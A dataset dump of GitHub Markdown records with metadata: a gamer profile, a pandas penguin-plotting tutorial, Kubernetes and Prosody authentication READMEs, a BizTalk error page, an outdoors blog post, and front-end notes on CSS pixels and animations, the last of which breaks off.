Dataset schema (column name, dtype, and observed range or class count):

| column | dtype | range / classes |
|---|---|---|
| hexsha | stringlengths | 40–40 |
| size | int64 | 5–1.04M |
| ext | stringclasses | 6 values |
| lang | stringclasses | 1 value |
| max_stars_repo_path | stringlengths | 3–344 |
| max_stars_repo_name | stringlengths | 5–125 |
| max_stars_repo_head_hexsha | stringlengths | 40–78 |
| max_stars_repo_licenses | listlengths | 1–11 |
| max_stars_count | int64 | 1–368k |
| max_stars_repo_stars_event_min_datetime | stringlengths | 24–24 |
| max_stars_repo_stars_event_max_datetime | stringlengths | 24–24 |
| max_issues_repo_path | stringlengths | 3–344 |
| max_issues_repo_name | stringlengths | 5–125 |
| max_issues_repo_head_hexsha | stringlengths | 40–78 |
| max_issues_repo_licenses | listlengths | 1–11 |
| max_issues_count | int64 | 1–116k |
| max_issues_repo_issues_event_min_datetime | stringlengths | 24–24 |
| max_issues_repo_issues_event_max_datetime | stringlengths | 24–24 |
| max_forks_repo_path | stringlengths | 3–344 |
| max_forks_repo_name | stringlengths | 5–125 |
| max_forks_repo_head_hexsha | stringlengths | 40–78 |
| max_forks_repo_licenses | listlengths | 1–11 |
| max_forks_count | int64 | 1–105k |
| max_forks_repo_forks_event_min_datetime | stringlengths | 24–24 |
| max_forks_repo_forks_event_max_datetime | stringlengths | 24–24 |
| content | stringlengths | 5–1.04M |
| avg_line_length | float64 | 1.14–851k |
| max_line_length | int64 | 1–1.03M |
| alphanum_fraction | float64 | 0–1 |
| lid | stringclasses | 191 values |
| lid_prob | float64 | 0.01–1 |
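Rows with this schema are commonly filtered on the quality columns before use; a minimal sketch with pandas, on a toy frame shaped like the schema above (the rows and the 0.9 threshold are illustrative assumptions, not values from the source):

```python
import pandas as pd

# Toy rows shaped like the schema above (all values are invented).
rows = pd.DataFrame({
    "hexsha": ["a" * 40, "b" * 40, "c" * 40],
    "ext": ["md", "md", "markdown"],
    "lid": ["eng_Latn", "yue_Hant", "eng_Latn"],
    "lid_prob": [0.98, 0.54, 0.73],
    "alphanum_fraction": [0.79, 0.55, 0.56],
})

# Keep only rows confidently identified as English; the threshold is arbitrary.
english = rows[(rows["lid"] == "eng_Latn") & (rows["lid_prob"] >= 0.9)]
print(len(english))  # 1
```

The same boolean-mask pattern extends to any combination of the quality columns (`alphanum_fraction`, `avg_line_length`, etc.).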
---

**Record** `6f42dadef374163324cf933d32d29645b50ac5cb` · 1,134 bytes · `md` / Markdown
`player/daigo_umehara.md` @ `hifight/hifight.github.io` (head `83aec1bb98fae1e7bc896c9854228f30c4b1d859`) · licenses `[ "MIT" ]`
stars: 2 (2018-05-20T18:12:31.000Z → 2018-09-08T07:28:54.000Z) · issues: null · forks: null
---
layout: player
title: "Daigo Umehara"
moment_link: "https://twitter.com/i/moments/991638553229578240?ref_src=twsrc%5Etfw"
profile_pic: daigo_umehara.jpg
profile_gfy: WeirdFrigidIncatern
article_gfy: IllShadyHog
twitter: "https://twitter.com/daigothebeast"
twitch: "https://www.twitch.tv/daigothebeastv"
hifight: UmeShoryu, UmeFlash, UmeNeutral
---

Also known as "The Beast". Twitch's first global ambassador, sponsored by Red Bull, HyperX, Cygames, and NSURGO in 2017. Currently holds the Guinness World Record as "the most successful player in major tournaments of Street Fighter".

Considered the strongest Street Fighter player in long sets (FT7–FT10), where he has time to prepare for a specific character/player match-up: he convincingly beat Infiltration, Xian, Momochi, and Tokido in long sets after each of them won EVO.

Outside of competing, Daigo also runs a lot of side projects through his BeasTV Twitch channel, such as Donation Colosseum and Kemonomichi, where he sets up the exhibition matches people want to see.

<hr/>
<h3>Characters</h3>

Street Fighter IV: Ryu, Yun, Evil Ryu

Street Fighter V: Ryu, Guile
avg_line_length: 34.363636 · max_line_length: 100 · alphanum_fraction: 0.787478 · lid: eng_Latn (0.984858)
---

**Record** `6f43777e889aebd4b706d87e9edcb0ac5497a724` · 166 bytes · `md` / Markdown
`README.md` @ `MoshBit/Student-Scholarship-Portal` (head `d28a2a125c25006bde1f509ff21cb0ce12d18490`) · licenses `[ "MIT" ]`
stars: null · issues: null · forks: null
# Student-Scholarship-Portal

DBMS project, Spring '21.<br/>
A basic web application developed using PHP and MySQL in partial fulfillment of the course Database Systems.
avg_line_length: 41.5 · max_line_length: 108 · alphanum_fraction: 0.819277 · lid: eng_Latn (0.922255)
---

**Record** `6f43f1a508dd5918f49b525cfef8b60f560d6113` · 12,020 bytes · `md` / Markdown
`_posts/2021-10-05-BlogPost0.md` @ `elliotshin/elliotshin.github.io` (head `0df26b3da438d0ac62b8d6b93ef2842ec76f8741`) · licenses `[ "MIT" ]`
stars: null · issues: null · forks: null
---
layout: post
title: Blog Post 0
---

## Introduction

Hi! My name is Elliot Shin, and today I will be guiding you through creating a data visualization using the Palmer Penguins pandas DataFrame! No need to be alarmed: we will only be looking at penguins, not pandas. Pandas simply refers to the Python package that makes working with data a little bit easier, and it comes with some useful functions for creating plots!

## Step 1: Importing the Data

First, we need to get the data!

```python
import pandas as pd
from matplotlib import pyplot as plt

url = "https://raw.githubusercontent.com/PhilChodrow/PIC16B/master/datasets/palmer_penguins.csv"
penguins = pd.read_csv(url)
```

The first line imports the pandas package and renames it `pd`. This is the conventional style, as it saves some typing (plus all the posts on Stack Overflow regarding pandas refer to it as `pd` as well). The second line, much like the first, imports another package, which we will use later on for plotting!

## Step 2: Data Inspection

Now we need to explore what our data looks like and gain some insight into which variables we can work with.
```python
penguins.head(10)  # show the first ten rows of the penguins dataframe
```

| | studyName | Sample Number | Species | Region | Island | Stage | Individual ID | Clutch Completion | Date Egg | Culmen Length (mm) | Culmen Depth (mm) | Flipper Length (mm) | Body Mass (g) | Sex | Delta 15 N (o/oo) | Delta 13 C (o/oo) | Comments |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| 0 | PAL0708 | 1 | Adelie | Anvers | Torgersen | Adult, 1 Egg Stage | N1A1 | Yes | 11/11/07 | 39.1 | 18.7 | 181.0 | 3750.0 | MALE | NaN | NaN | Not enough blood for isotopes. |
| 1 | PAL0708 | 2 | Adelie | Anvers | Torgersen | Adult, 1 Egg Stage | N1A2 | Yes | 11/11/07 | 39.5 | 17.4 | 186.0 | 3800.0 | FEMALE | 8.94956 | -24.69454 | NaN |
| 2 | PAL0708 | 3 | Adelie | Anvers | Torgersen | Adult, 1 Egg Stage | N2A1 | Yes | 11/16/07 | 40.3 | 18.0 | 195.0 | 3250.0 | FEMALE | 8.36821 | -25.33302 | NaN |
| 3 | PAL0708 | 4 | Adelie | Anvers | Torgersen | Adult, 1 Egg Stage | N2A2 | Yes | 11/16/07 | NaN | NaN | NaN | NaN | NaN | NaN | NaN | Adult not sampled. |
| 4 | PAL0708 | 5 | Adelie | Anvers | Torgersen | Adult, 1 Egg Stage | N3A1 | Yes | 11/16/07 | 36.7 | 19.3 | 193.0 | 3450.0 | FEMALE | 8.76651 | -25.32426 | NaN |
| 5 | PAL0708 | 6 | Adelie | Anvers | Torgersen | Adult, 1 Egg Stage | N3A2 | Yes | 11/16/07 | 39.3 | 20.6 | 190.0 | 3650.0 | MALE | 8.66496 | -25.29805 | NaN |
| 6 | PAL0708 | 7 | Adelie | Anvers | Torgersen | Adult, 1 Egg Stage | N4A1 | No | 11/15/07 | 38.9 | 17.8 | 181.0 | 3625.0 | FEMALE | 9.18718 | -25.21799 | Nest never observed with full clutch. |
| 7 | PAL0708 | 8 | Adelie | Anvers | Torgersen | Adult, 1 Egg Stage | N4A2 | No | 11/15/07 | 39.2 | 19.6 | 195.0 | 4675.0 | MALE | 9.46060 | -24.89958 | Nest never observed with full clutch. |
| 8 | PAL0708 | 9 | Adelie | Anvers | Torgersen | Adult, 1 Egg Stage | N5A1 | Yes | 11/9/07 | 34.1 | 18.1 | 193.0 | 3475.0 | NaN | NaN | NaN | No blood sample obtained. |
| 9 | PAL0708 | 10 | Adelie | Anvers | Torgersen | Adult, 1 Egg Stage | N5A2 | Yes | 11/9/07 | 42.0 | 20.2 | 190.0 | 4250.0 | NaN | 9.13362 | -25.09368 | No blood sample obtained for sexing. |

We can see that the dataset has variables such as species name, island, culmen length and depth, sex, etc.
We can also see the summary statistics for the numerical variables using this line of code:

```python
penguins.describe()
```

| | Sample Number | Culmen Length (mm) | Culmen Depth (mm) | Flipper Length (mm) | Body Mass (g) | Delta 15 N (o/oo) | Delta 13 C (o/oo) |
|---|---|---|---|---|---|---|---|
| count | 344.000000 | 342.000000 | 342.000000 | 342.000000 | 342.000000 | 330.000000 | 331.000000 |
| mean | 63.151163 | 43.921930 | 17.151170 | 200.915205 | 4201.754386 | 8.733382 | -25.686292 |
| std | 40.430199 | 5.459584 | 1.974793 | 14.061714 | 801.954536 | 0.551770 | 0.793961 |
| min | 1.000000 | 32.100000 | 13.100000 | 172.000000 | 2700.000000 | 7.632200 | -27.018540 |
| 25% | 29.000000 | 39.225000 | 15.600000 | 190.000000 | 3550.000000 | 8.299890 | -26.320305 |
| 50% | 58.000000 | 44.450000 | 17.300000 | 197.000000 | 4050.000000 | 8.652405 | -25.833520 |
| 75% | 95.250000 | 48.500000 | 18.700000 | 213.000000 | 4750.000000 | 9.172123 | -25.062050 |
| max | 152.000000 | 59.600000 | 21.500000 | 231.000000 | 6300.000000 | 10.025440 | -23.787670 |

Let's see if we can spot any differences between the species and their respective statistics.

## Step 3: How Many Species Are There?

Since we want to group our data by species type, the next logical question is: how many different species are there, and what are they? First we want just the first word of each species name, so let's alter the "Species" column of the penguins dataset:

```python
# retrieve the first word of the Species column
penguins["Species"] = penguins["Species"].str.split().str.get(0)
```

Wow! Looks complex, doesn't it? It is actually a really simple line of code once you know your data types and functions. Essentially, since each penguin is recorded as "___ penguin", we just want the "___". This code extracts the first word of each value in the Species column by splitting the entry into a list of words and taking the first element of that list.

Now we want to figure out how many unique values are present in the Species column. Good thing there is a data type that does just that: the set!

```python
species_set = set(penguins["Species"])  # collect the unique species values
species_set
```

```
{'Adelie', 'Chinstrap', 'Gentoo'}
```

It turns out there are 3 unique species: Adelie, Chinstrap, and Gentoo!

## Step 4: Plotting

Let's see the relationship between culmen depth and culmen length for each species!
```python
fig, ax = plt.subplots(1)  # create one subplot, which returns two things: a figure and an axis

for x in species_set:  # for each unique species name (Adelie, Chinstrap, Gentoo)
    length = penguins["Culmen Length (mm)"]
    depth = penguins["Culmen Depth (mm)"]
    mask = penguins["Species"] == x  # boolean mask selecting only this species
    ax.scatter(length[mask], depth[mask], label=x, alpha=0.5)  # plot based on the mask

ax.set(xlabel="Culmen Length (mm)", ylabel="Culmen Depth (mm)")  # set axis labels
# since we set the label from x, our species in species_set, the legend is generated from that
ax.legend()
```

![plot_blog0.png](/images/plot_blog0.png)

Let's break down this chunk of code. First we create a figure object and an axis for the plot. Next we use a for loop to plot culmen length against culmen depth **per species**. In order to do so, we need a **mask**: a conditional statement that limits which rows we look at. The mask in this example is the species name, so for each species group we say: "only plot culmen length and culmen depth for rows whose species name is ___" (where the blank is one of the three species names).

Let's take a look at the functions performed on our `ax` object:

- `ax.scatter()` tells the axis to draw a scatter plot.
- `ax.set()` creates the axis labels for our plot.
- `ax.legend()` creates a legend based on our species, since we divided our plot by species.

There you have it, prospective PIC 16A student! Not too difficult, right?
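The mask-per-species loop described above can also be written with pandas' `groupby`, which hands you one sub-frame per species and makes the mask implicit. A minimal sketch on a tiny made-up frame (the column and species names mirror the post; the numeric values here are invented):

```python
import pandas as pd
import matplotlib
matplotlib.use("Agg")  # render off-screen; no display window needed
from matplotlib import pyplot as plt

# A tiny stand-in for the penguins DataFrame (values are invented).
penguins = pd.DataFrame({
    "Species": ["Adelie", "Adelie", "Chinstrap", "Gentoo"],
    "Culmen Length (mm)": [39.1, 39.5, 48.8, 46.1],
    "Culmen Depth (mm)": [18.7, 17.4, 18.4, 13.2],
})

fig, ax = plt.subplots(1)
# groupby yields (species_name, sub_frame) pairs, replacing the manual mask.
for species, group in penguins.groupby("Species"):
    ax.scatter(group["Culmen Length (mm)"], group["Culmen Depth (mm)"],
               label=species, alpha=0.5)
ax.set(xlabel="Culmen Length (mm)", ylabel="Culmen Depth (mm)")
ax.legend()
print(len(ax.collections))  # one scatter collection per species: 3
```

Either style works; `groupby` just avoids re-scanning the full frame once per species.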
avg_line_length: 27.072072 · max_line_length: 522 · alphanum_fraction: 0.564309 · lid: eng_Latn (0.7367)
---

**Record** `6f44089f3ae47b05a6a9b599f28602db092ce5fb` · 1,490 bytes · `md` / Markdown
`README.md` @ `carlosas/kfs-test` (head `fa1f9d893ceb0f4daf7541a9cba6dd4734fd6b72`) · licenses `[ "MIT" ]`
stars: 20 (2017-10-17T09:34:59.000Z → 2021-06-15T17:43:40.000Z) · issues: null · forks: 5 (2017-12-11T10:07:32.000Z → 2019-03-13T19:48:21.000Z)
# Kubernetes for Symfony

[![license](https://img.shields.io/github/license/mashape/apistatus.svg?style=flat-square)](LICENSE) [![contributions](https://img.shields.io/badge/contributions-welcome-brightgreen.svg?style=flat-square)](https://github.com/carlosas/kubernetes-for-symfony/issues) [![HitCount](http://hits.dwyl.com/carlosas/kubernetes-for-symfony.svg)](README.md)

![](doc/schema.png)

---

WARNING :warning: **This project is no longer maintained (for now)**

---

## Introduction

This stack is a starting point for building a distributed and scalable stack with Kubernetes. It runs locally with Minikube, but it can be modified to use AWS or GCE. Any contribution in this direction would be appreciated.

## Quick guide

### Requirements

* kubectl: https://kubernetes.io/docs/tasks/tools/install-kubectl/
* minikube: https://kubernetes.io/docs/tasks/tools/install-minikube/

### Usage

#### Build and start the stack

* Define your passwords in *kubernetes/secrets.yaml*, encoded in base64:

```sh
echo -n "MYPASSWORD" | base64
```

> For Jenkins, encode: `--argumentsRealm.passwd.jenkins=MYPASSWORD --argumentsRealm.roles.jenkins=admin`

* Start the stack

```sh
./scripts/start-and-create.sh
```

* Create local persistent volumes

```sh
./scripts/create-persistent-volumes.sh
```

* Clone your repository into the stack *(set 'mysql' as the database host)*

```sh
./scripts/clone-my-repository.sh
```

#### Clean up and stop the stack

```sh
./scripts/stop-and-delete.sh
```
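Note that Kubernetes secrets are base64-*encoded*, not encrypted. The `echo -n | base64` step can be reproduced in any language; a sketch in Python, shown only to illustrate what the encoding does (Kubernetes itself decodes the value from `secrets.yaml` at mount time):

```python
import base64

# Equivalent of: echo -n "MYPASSWORD" | base64
encoded = base64.b64encode(b"MYPASSWORD").decode("ascii")
print(encoded)  # TVlQQVNTV09SRA==

# The encoding is trivially reversible, which is why it is not a security measure.
assert base64.b64decode(encoded) == b"MYPASSWORD"
```

The `-n` flag in the shell version matters: without it, `echo` appends a newline that ends up inside the encoded secret.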
avg_line_length: 24.42623 · max_line_length: 223 · alphanum_fraction: 0.736242 · lid: eng_Latn (0.649154)
---

**Record** `6f4423a5f8a21f427d28d527aa097725cc11e113` · 1,513 bytes · `md` / Markdown
`biztalk/core/single-sign-on-event-10564.md` @ `OPS-E2E-PPE/biztalk-docs.ja-JP` (head `5e8314d59a5aa91e3eb4a20c1bdbc75821170d17`) · licenses `[ "CC-BY-4.0", "MIT" ]`
stars: null · issues: null · forks: null
---
title: 'Single Sign-On: Event 10564 | Microsoft Docs'
ms.custom: ''
ms.date: 06/08/2017
ms.prod: biztalk-server
ms.reviewer: ''
ms.suite: ''
ms.tgt_pltfrm: ''
ms.topic: article
ms.assetid: e523c97a-608e-4bf4-8747-cfa0cce10acf
caps.latest.revision: 7
author: MandiOhlinger
ms.author: mandia
manager: anneta
ms.openlocfilehash: 9ddea5def52677643930d215bd17a82359b55d90
ms.sourcegitcommit: 381e83d43796a345488d54b3f7413e11d56ad7be
ms.translationtype: MT
ms.contentlocale: ja-JP
ms.lasthandoff: 05/07/2019
ms.locfileid: "65398799"
---
# <a name="single-sign-on-event-10564"></a>Single Sign-On: Event 10564

## <a name="details"></a>Details

| | |
|---|---|
| Product Name | Enterprise Single Sign-On |
| Product Version | [!INCLUDE[btsSSOVersion](../includes/btsssoversion-md.md)] |
| Event ID | 10564 |
| Event Source | ENTSSO |
| Component | None |
| Symbolic Name | SSO_ERROR_BACKUP_FILE_INCORRECT_FORMAT |
| Message Text | The backup file does not have the correct format. |

## <a name="explanation"></a>Explanation

The backup file does not have the correct format.

## <a name="user-action"></a>User Action

Verify that the file name and location are correct. You should also verify that there are no other files with the .BAK extension in that folder, as the ENTSSO system may confuse them with the actual backup file.
avg_line_length: 38.794872 · max_line_length: 115 · alphanum_fraction: 0.548579 · lid: yue_Hant (0.541731)
---

**Record** `6f442a94453d580d41fabca692206a863bf8009e` · 2,540 bytes · `markdown` / Markdown
`mod_auth_http/README.markdown` @ `gbeine/prosody-modules` (head `6aaadbec259a52a2380882cb18964e83b55fb645`) · licenses `[ "MIT" ]`
stars: null · issues: null · forks: null
---
labels:
- Stage-Alpha
summary: "Authenticate users against an external HTTP API"
...

# Overview

This authentication module allows Prosody to authenticate users against an external HTTP service.

# Configuration

``` lua
VirtualHost "example.com"
authentication = "http"
http_auth_url = "http://example.com/auth"
```

If the API requires Prosody to authenticate, you can provide static credentials using HTTP Basic authentication, like so:

```
http_auth_credentials = "prosody:secret-password"
```

# Developers

This section contains information for developers who wish to implement an HTTP service that Prosody can use for authentication.

## Protocol

Prosody will make an HTTP request to the configured API URL with an appended `/METHOD`, where `METHOD` is one of the methods described below. GET methods must expect a series of URL-encoded query parameters, while POST requests will receive a URL-encoded form (i.e. `application/x-www-form-urlencoded`).

## Parameters

user
: The username, e.g. `stephanie` for the JID `stephanie@example.com`.

server
: The host part of the user's JID, e.g. `example.com` for the JID `stephanie@example.com`.

pass
: For methods that verify or set a user's password, the password will be supplied in this parameter; otherwise it is not set.

## Methods

The only mandatory methods that the service must implement are `check_password` and `user_exists`. Unsupported methods should return an HTTP status code of `501 Not Implemented`, but other error codes will also be handled by Prosody.

### register

**HTTP method:**
: POST

**Success codes:**
: 201

**Error codes:**
: 409 (user exists)

### check_password

**HTTP method:**
: GET

**Success codes:**
: 200

**Response:**
: A text string of `true` if the password was correct, or `false` otherwise.

### user_exists

**HTTP method:**
: GET

**Success codes:**
: 200

**Response:**
: A text string of `true` if the user exists, or `false` otherwise.
### set_password

**HTTP method:**
: POST

**Success codes:**
: 200, 201, or 204

### remove_user

**HTTP method:**
: POST

**Success codes:**
: 200, 201, or 204

## Examples

With the following configuration:

```
authentication = "http"
http_auth_url = "https://auth.example.net/api"
```

If a user connects and tries to log in to Prosody as "romeo@example.net" with the password "iheartjuliet", Prosody would make the following HTTP request:

```
https://auth.example.net/api/check_password?user=romeo&server=example.net&pass=iheartjuliet
```

# Compatibility

Requires Prosody 0.11.0 or later.
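The request/response shapes above are easy to prototype. Below is a minimal, hypothetical sketch of the service-side dispatch using only the Python standard library; the in-memory user store and the example host are invented for illustration, and a real service would check a database, handle the POST methods, and serve HTTPS:

```python
from urllib.parse import urlsplit, parse_qs

# Invented in-memory user store, keyed by (user, server).
USERS = {("romeo", "example.net"): "iheartjuliet"}

def handle_auth(url: str) -> tuple[int, str]:
    """Answer a Prosody auth request like .../check_password?user=...&server=...&pass=..."""
    parts = urlsplit(url)
    method = parts.path.rsplit("/", 1)[-1]  # the appended /METHOD segment
    q = {k: v[0] for k, v in parse_qs(parts.query).items()}
    key = (q.get("user"), q.get("server"))
    if method == "check_password":
        # a plain "true"/"false" body with status 200, as the protocol requires
        return 200, "true" if USERS.get(key) == q.get("pass") else "false"
    if method == "user_exists":
        return 200, "true" if key in USERS else "false"
    return 501, "Not Implemented"  # unsupported methods

status, body = handle_auth(
    "https://auth.example.net/api/check_password?user=romeo&server=example.net&pass=iheartjuliet"
)
print(status, body)  # 200 true
```

Only the two mandatory GET methods are sketched here; `register`, `set_password`, and `remove_user` would read the same parameters from a POSTed `application/x-www-form-urlencoded` body instead of the query string.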
avg_line_length: 19.689922 · max_line_length: 91 · alphanum_fraction: 0.73189 · lid: eng_Latn (0.976479)
---

**Record** `6f44410706f6535b887c1af6db0e2db057c3616f` · 5,078 bytes · `md` / Markdown
`content/ponder/thought-2018-02-27-why-be-an-outdoors-man-daily-ponders-4.md` @ `jlrude91/RudeThoughts` (head `5877e8103387b7703ff527ba6a77354f5edbb96c`) · licenses `[ "Apache-2.0" ]`
stars: null · issues: null · forks: null
---
title: Why be an Outdoors Man?
draft: false
date: 2018-02-27T16:18:26.000Z
author: Jerry Rude
authorAvatar: uploads/author_JerryRude.jpg
image: /uploads/14908297_10210878985115859_5059444685567478332_n.jpg
categories: ponder
tags:
- Outdoors Man
- Nature
- Hunting
- Daily Ponders
comments: true
share: true
type: post
---

It's springtime; deer season is over, and next in line are turkey and morel mushrooms. Like basically all of my articles, "why" is the question: why is it that I get out and do the things that I do? Getting up, sometimes hours before the sun rises. Sitting in the cold and wet, trying to hold in any warmth that I can with layers of camo and a thermos of coffee.

I love it. Being out in nature is hard to describe, really. Those that do it and have done it can relate to this feeling, but describing it to the unexposed is basically impossible. For me, I can take that one step further, and higher: the mountains of Appalachia are where I really feel it. When you get away from the lights of the city, you can still hear the cars on the highway. You get away from the noises of the highway, and your phone still has service. But when you get into the hills of Appalachia, you are truly alone. You breathe the air differently, the sky is a different blue, the nighttime stars... simply unimaginable.

From an economic viewpoint this seems inefficient: a waste of time, resources, and money. We won't get into the economic discussion of what makes you happy and why you do those things today. Instead, I will be making my argument for the outdoors man, and why I believe everyone should at least take some time out of their day, week, or month and venture into the wild.

To begin, I don't currently own a tent, though I have in the past. You don't need a map or a compass, you don't need to hunt, you don't have to do so much as put mud on your boots to enjoy the open and wild wilderness. Everyone in this country is a public land owner.
The taxes you pay go towards the maintenance of public lands, to be used at your discretion (to a degree). Why not use them? Go for a walk at your reservoir, learn how to fish, take your kids to nature parks. You already pay for all of this, so why not use it?

Exercise: generally you need to be physically fit to some degree to do the things mentioned, but you don't need to become physically fit before you start. It starts with a short walk, then you start completing the mile loop. Next you're incorporating the stairs, and before you know it you're going on half-day hikes. Unless your hobbies currently include some kind of fitness-bettering regimen, I think we could all agree that America could focus a little more on overall health.

Say you do want to fish or hunt. For the minimum necessary, not buying top-of-the-line everything, you can spend $150 (this could be even lower if you bought used) on some fishing gear and licenses and have a meal a week covered for a year. The price point goes up a bit to get into hunting, but not too much, and if you're successful, your reward is often much greater.

Look at my last few years of deer hunting. Unfortunately I can't include this year, as I did not harvest a deer. Over the two years before that, I spent $300 on a bow and arrows, about $50 on tags, $40 on a tree stand, and about $250 on butchering. What did I get? I totaled over 150 lbs of meat: roasts, steaks, ground, summer sausage, jerky, brats, and more. The license also covered hunting rabbit, squirrel, dove, turkey, and other small game. In total I bagged close to 175 lbs of meat and spent a little under $650. That's about $3.70/lb for the most lean, free-range, healthy meat you could ever have. This doesn't include any of my fishing success, which would lower that final per-pound cost even further.
You could also butcher the meat yourself (as I've done in the past, though it requires more time than I can devote to it right now) to cut that price nearly in half.

We all could benefit from the outdoors a little more. Go bird watching, use the bike trails, kayak, rock climb, anything really. On top of all that has been mentioned, I strongly believe that if more people incorporated the outdoors into their lives, we would see a vast improvement in our societies: an overall increase in the demand to reduce pollution, an overall heightened level of social values and morals (this, I believe, would stem from seeing more people and animals live their everyday lives, strengthening the sense of community), and people just being happier in general, to name a few. As a consequence of all this, maybe everyone's health insurance premiums go down because overall health goes up. Maybe those expensive health stores that sell local farmers' food get a little cheaper, because we start getting serious about the food we put in our bodies instead of ignorantly sharing news articles about GMOs while simultaneously shoving fast-food fat burgers and liters of soda down our throats.

Get away from your phone, stop reading this, walk to your local park, and just get outside. What do you have to lose?
avg_line_length: 220.782609 · max_line_length: 2,279 · alphanum_fraction: 0.782198 · lid: eng_Latn (0.999923)
---

**Record** `6f4448c914f2e2cef7a82ffa07f5d024f3484585` · 172,479 bytes · `md` / Markdown
`_posts/2018-11-14-need-do.md` @ `yuccie/jsArt` (head `230be63f78bfa403cf469ab80236f5a3284e6e96`) · licenses `[ "CC-BY-4.0" ]`
stars: null · issues: 1 (2020-06-14T13:41:18.000Z → 2020-06-14T13:41:18.000Z) · forks: 1 (2019-05-20T09:13:03.000Z → 2019-05-20T09:13:03.000Z)
---
layout: post
title: What's Past Is Prologue
date: Fri May 10 2019 17:25:50 GMT+0800 (China Standard Time)
---

> A note up front: in day-to-day development I keep running into the same problems, and most of the time I have to look up the same references all over again, which not only wastes time but makes every occurrence feel like starting from scratch. So I am collecting these common problems here; whenever a related problem comes up later, it gets grouped into its category for comparative study.

References: [front-end resource collection (Juejin)][allFrontEndResourceUrl], [front-end knowledge you may need][frontEndResourceOneUrl], [mid/senior interview handbook][middleAndHighLevelIterviewUrl], [33 concepts every JavaScript developer should know][jsEngineerShouldKonw33Concept], [what you need to know about JS][aboutJsYouNeedKonw], [how browsers work, behind the scenes][howBrowsersworkUrl]

#### ***Display devices***

***CSS pixels***

Reference: [CSS, physical, device, and device-independent pixels][cssPxDevicePxUrl]

Every length in the browser is measured in CSS pixels. The unit is px (short for "pixel"), the basic unit of image display. **It is neither a fixed physical quantity nor a dot or a little square, but an abstraction.**

***Note:*** a physical pixel is equivalent to a device pixel.

In the CSS spec, units are either relative or absolute, and px is a relative unit: relative to the **device pixel**.

On the same device, or across different devices, **the number of physical pixels represented by one CSS pixel can change**.

Different devices have different basic display units: a monitor's physical pixel corresponds to its dot pitch, a printer's to its ink dot; the two are measured in ppi and dpi respectively.

**ppi:** pixels per inch (2.54 cm); for a display, how many physical pixels per inch, i.e. the display's dot pitch.

**dpi:** dots per inch (2.54 cm).

Because physical pixel sizes differ between devices, **the CSS spec says browsers should adjust CSS pixels so that 1 CSS pixel looks roughly the same size on any device**. To achieve this, the browser can convert directly based on the device's physical pixel size.

Since the CSS pixel is defined by visual angle, in practice everything is converted from device pixels; the browser can read the ratio (the dpr) straight from the hardware.

Suppose we open a page in a desktop browser that is 800px wide, containing a 400px-wide block container: the container fills half the screen. Zoom to 200% (cmd and +), i.e. twice the original, and the container now fills the whole browser width.

The `zoom` style property on `body` has the same effect as cmd-+; if you change the page size with `zoom`, you must divide measured sizes by the zoom factor to get the real values:

```js
// getComputedStyle returns the computed style object
document.body.style.zoom = 0.8
var zoomVal = window.getComputedStyle(document.body).zoom;
newHeight = window.innerHeight / zoomVal
```

We did not resize the browser window or change the container's CSS width, yet it looks twice as big. That is because **we scaled the CSS pixel up by a factor of two** (the number of physical pixels a CSS pixel represents can change).

Normally CSS pixels map 1:1 to screen pixels, but the browser's zoom changes that ratio: now 1 CSS pixel = 2 device pixels, while the device pixel density never changes (it is fixed at the factory; pt is an absolute unit), so the container scaled 2x fills the screen.

**dpr:** DPR = device pixels / CSS pixels

There is also the dip, the device-independent pixel (as the name says, independent of any particular device), also called the logical pixel, which is again the CSS pixel.

So: CSS pixel = device-independent pixel = logical pixel.

In mobile browsers and some desktop browsers, the `window` object has a `devicePixelRatio` property: `devicePixelRatio = physical pixels / independent pixels`. On a Mac it prints 2, on an ordinary display 1; that is the so-called Retina screen. **Also note that after zooming the browser window, the `devicePixelRatio` printed in the console changes**, because the independent pixels changed: originally 1px = 2 device pixels; after zooming in, say, 1px = 4 device pixels, and zooming out does the opposite. Picture a 1px-wide color block: zoomed 2x it looks twice as big while the physical pixels are unchanged, so the CSS pixel can only have grown, and `devicePixelRatio` grows with it.

See the figure below:

![dpr&ppi](/jsArt/assets/images/js-theory/dpr-ppi.png)

If we put the same page on devices with different devicePixelRatio values, we would expect the effect in the figure: a high-devicePixelRatio device has a higher ppi (pixel density), its physical pixels are smaller and denser, so the page should render smaller but sharper.

In reality, however, the two look the same. That is because a Retina screen treats 2x2 pixels as one pixel: a navigation bar that was 44 pixels tall is displayed using 88 physical pixels on a Retina screen, so UI elements are doubled in size and end up looking the same, only sharper.

Then if mobile pages just used px as the unit, wouldn't the device convert to physical pixels automatically via `devicePixelRatio`, and there would be no adaptation problem at all?

***The 1px border problem***

On a non-high-density screen, CSS pixels map 1:1 to physical (device) pixels, so the well-known 1px problem does not occur. On a high-density screen, 1 CSS pixel no longer represents one device pixel but several, so a 1px border looks thick. Fixes include scaling, box-shadow, setting the border dynamically based on the device's dpr, or dynamically setting initial-scale, maximum-scale, and minimum-scale in the viewport meta tag to 1/dpr.

**In essence**, the problem is that 1px covers too many device pixels, so any approach that reduces that count works. Setting 0.5px or 0.33px directly is handled differently by each browser, and setting everything to 1px gives the thick-border problem.

```css
/* 1. Media queries (this will eventually become standard) */
.border { border: 1px solid #999 }
@media screen and (-webkit-min-device-pixel-ratio: 2) {
  .border { border: 0.5px solid #999 }
}
@media screen and (-webkit-min-device-pixel-ratio: 3) {
  .border { border: 0.333333px solid #999 }
}

/* 2. Use a shadow */
.border-1px {
  box-shadow: 0px 0px 1px 0px red inset;
}

/* 3. Pseudo-element plus transform (scale on the Y axis) */
.scale-1px {
  position: relative;
  border: none;
}
.scale-1px:after {
  content: '';
  position: absolute;
  bottom: 0;
  background: #000;
  width: 100%;
  height: 1px;
  transform: scaleY(0.5);
  transform-origin: 0 0;
}

/* 4. Taobao's strategy also works: set initial-scale, maximum-scale,
   and minimum-scale dynamically to 1/dpr based on the device's dpr.
   But doesn't that scale every element on the page? Should they all be scaled? */
```

```js
// 5. A newer approach:
// detect 0.5px support
if (dpr >= 2) {
  var fakeBody = document.createElement('body')
  var testElement = document.createElement('div')
  testElement.style.border = '.5px solid transparent'
  fakeBody.appendChild(testElement)
  docEl.appendChild(fakeBody)
  if (testElement.offsetHeight === 1) {
    docEl.classList.add('hairlines')
  }
  docEl.removeChild(fakeBody)
}
```

##### ***CSS3 animations***

Property | Description
- | -
animation-name | The name of the @keyframes rule
animation-duration | How many seconds or milliseconds the animation takes to complete
animation-timing-function | The easing used, e.g. linear for constant speed, ease, etc.
animation-delay | The delay before the animation starts; only applies to the first run
animation-iteration-count | How many times the animation plays; default 1, infinite to loop forever
